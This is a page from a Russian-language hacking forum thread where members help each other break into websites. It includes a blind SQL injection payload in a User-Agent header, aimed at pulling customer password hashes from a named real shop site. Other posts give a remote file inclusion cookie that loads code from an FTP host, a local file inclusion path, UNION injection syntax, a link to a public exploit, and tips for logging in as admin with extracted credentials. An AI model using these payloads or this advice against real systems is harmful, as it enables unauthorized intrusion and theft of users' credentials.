Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 466 of 1207
  1. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а можно подробнее?
     
    #9301 TELO, 16 Oct 2009
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Т.е. ты достаешь данные из таблички пользователей сайта. А путь ты нашёл не к админке сайта, а к phpmyadmin'у и directadmin'y, соответственно пароль не подходит. Авторизация, как было сказано выше, на главной странице. Авторизируйся под логином и паролем admin.
     
    #9302 mailbrush, 16 Oct 2009
  3. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Нашел инъекцию через юзер агента(Tampler data рулит).Как подставлять запросы?
    Пробовал and+select+version() и тд-непрет.
    Сайтик www.prozis.es
    После названия браузера ставим кавычку.
    Code:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (' at line 1

replace into robots (user_agent, last_access, num_access) values ('Mozilla/5.0' (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)',now(),0)
     
    #9303 2Fed123, 16 Oct 2009
  4. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    ',(more1row_or_duplicate_column_names),'1'),('M
     
    #9304 l1ght, 16 Oct 2009
    2 people like this.
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Вот смотрите, дорогие друзья, вот так НЕНАДО помогать новичкам

    l1ght ты правда думаешь, что он понял? :)
     
    #9305 Kakoytoxaker, 16 Oct 2009
    1 person likes this.
  6. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    2Fed123

    Почитай про blind-скл-инъекии статьи Elect'a и Qwazar'a на этом форуме.
    Раскрутить можно:
    Code:
    User-Agent: Mozilla/5.0',if((locate(substr((select customers_password from customers limit 1),1),'0123456789abcdef')),now(),(select 1 union select 2)), 0) #
    и т.д.
     
    #9306 cr0w, 16 Oct 2009
    1 person likes this.
  7. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://milw0rm.com/exploits/8921
     
    #9307 [Raz0r], 17 Oct 2009
  8. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Насколько я понимаю, то к этому:
    этот сплойт:
    не прокатит, т.к. не подходит конфигурация пма.
     
    #9308 $n@ke, 17 Oct 2009
  9. Rezak

    Rezak New Member

    Joined:
    25 Jan 2008
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа
    PHP:
    <? $a($b); ?>
    он юзается примерно так: test.php?a=phpinfo&b=32
    вот и подумал может с классами также можно извратиться.

    P.S. Это к сообщению про вот этот скрипт
    PHP:
    <?
    $template->set_filenames(array('head'=>"$template_path/header.html"));
    $template->pparse('head');
    ?>
     
    #9309 Rezak, 17 Oct 2009
    Last edited: 17 Oct 2009
  10. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    есть какие нибудь базы по хешам желательный на пхп или exe
     
    #9310 tracy, 17 Oct 2009
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    hashcracking.info
     
    #9311 mailbrush, 17 Oct 2009
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет есть стандартная инъекция в MySQL вида:
    site.ru/index.php?id=1+union+select+1,2,3,4,5--+
    Возможно ли сделать UPDATE или INSERT в базу?
     
    #9312 Byrger, 17 Oct 2009
  13. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    нет
     
    #9313 Iceangel_, 17 Oct 2009
    1 person likes this.
  14. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Возможно ли сделать прокси из сервера на котором есть шелл?
    Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
     
    #9314 Byrger, 17 Oct 2009
  15. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    https://forum.antichat.ru/thread93318.html
     
    #9315 Dyxxx, 17 Oct 2009
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
    PHP:
    if(is_dir($_COOKIE['skin']))
    include(    $_COOKIE['skin'].'/template.php');
    Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.
     
    #9316 mailbrush, 17 Oct 2009
    Last edited: 17 Oct 2009
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Это можно замутить если тока register_globals = on
    в php.ini
     
    #9317 Ctacok, 17 Oct 2009
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Там RFI
    Cookie: skin=ftp://vasya:[email protected]/

    ну а на фтпшнике соответственно файл template.php
    + "Начиная с PHP 5.0.0, эта функция также может быть использована с некоторыми упаковщиками url."
    ==
    Если интересует именно LFI произвольного файла, то врятли
     
    #9318 Kakoytoxaker, 17 Oct 2009
    Last edited: 17 Oct 2009
    2 people like this.
  19. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Покажи как. Вот как раз для случая с
    Code:
    $template->set_filenames(array('head'=>"$template_path/header.html"));
     
    #9319 Qwazar, 17 Oct 2009
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    PHP:
    file.php?template=../index.php%0D
    Ну а я вообщем то говорил про первый пример, так что строго не судите :)
     
    #9320 Ctacok, 17 Oct 2009
(You must log in or sign up to post here.)
Page 466 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.